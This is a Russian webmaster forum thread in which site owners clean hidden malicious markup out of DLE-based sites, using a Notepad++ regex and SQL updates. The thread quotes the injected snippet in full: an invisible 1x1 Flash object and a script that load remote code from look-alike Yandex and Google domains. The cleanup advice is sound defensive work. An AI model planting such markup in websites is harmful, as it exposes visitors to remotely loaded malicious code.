- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
В 2023 году Google заблокировал более 170 млн фальшивых отзывов на Картах
Это на 45% больше, чем в 2022 году
Оксана Мамчуева
Что делать, если ваша email-рассылка попала в спам
10 распространенных причин и решений
Екатерина Ткаченко
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Здравствуйте. Собственно SOS.
Необходимо в NotePad++ заменить часть строки начинающуюся на <object и заканчивающуюся на </script> , после чего перейти на другую строку и начать поиск и замену далее. Необходимо цикличное выражение.
Вот начало:
(<object)[\W\w]*(</script>)
Строка вида:
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?d09bf41544a3365a46c9077ebb5e35c3"><param name="quality" value="high"/><param name="scale" value="exactfit"><param name="bgcolor" value="#FFFFFF"/><param name="AllowScriptAccess" value="always"/><embed src="http://webmasters-yandex.ru/flash.swf?d09bf41544a3365a46c9077ebb5e35c3" width="1" height="1" type="application/x-shockwave-flash" AllowScriptAccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object><script async="async" type="text/javascript" src="http://google-webmaster.ru/d09bf41544a3365a46c9077ebb5e35c3.js"></script>
его нужно грамотно удалить не зацепив остальной текст. Прошу помощи.
<object classid=.+?</object><script async="async".+?</script>
Большое спасибо. Помогло.
У меня тоже такой код в каждой статье появился. Удалил, через час снова залили. Каким образом?
P.S. Пришел к выводу что ДЛЕ очень дырявый двиг для сайтов. Буду переносить на Друпал.
неважно ...........
Дениско, шелл могут залить через любой движок :) А может быть еще хостер дырявый. Или твой комп заражен. И т. п.
вчера почистил 3 базы у клиента (на 3х разных аккаунтах) от подобных вставок, шелл нашелся только на одном сайте.
siv1987, я делал регулярное выражение
но оно иногда срабатывало не правильно, выделяя 2-3 строчки, почему?
вчера почистил 3 базы у клиента (на 3х разных аккаунтах) от подобных вставок, шелл нашелся только на одном сайте, может и не в шеллах дело?
siv1987, я делал регулярное выражение
но оно иногда срабатывало не правильно, выделяя 2-3 строчки, почему?
также можно проапдейтить через phpmyadmin
update dle_post set short_story = left(short_story, locate('<script async="async" type="text/javascript" src="http://google-webmaster.ru/', short_story)-1) WHERE locate('<script async="async" type="text/javascript" src="http://google-webmaster.ru/', short_story) > 0 limit 20000
update dle_post set full_story = left(full_story, locate('<script async="async" type="text/javascript" src="http://google-webmaster.ru/', full_story)-1) WHERE locate('<script async="async" type="text/javascript" src="http://google-webmaster.ru/', full_story) > 0 limit 20000
для полной и краткой новости, выполнить несколько раз, пока не буддет выдаваться: изменено 0 строк.
вот эту бяку можно изменить и под <object, перед этим удостовериться, что у Вас в базе нет подобных нужных строк.
Обязательно поменять пароли, очистить кэш и поставить все фиксы для DLE.
Если кто не может справиться ,пишите в личку, помогу.
вот виновник [95.143.193.61], 205.204.90.114 и так же с локалхоста.
Уже начали раньше обсуждать этот вредоносный код. Предлагаю, что бы не плодить кучу тем, там и продолжать, в одном месте. Ссылка на тему
siv1987, я делал регулярное выражение
Смотря какой модификатор используется, если не используется молификатор инвертирующий жадность, то следует добавить знак вопроса - .*?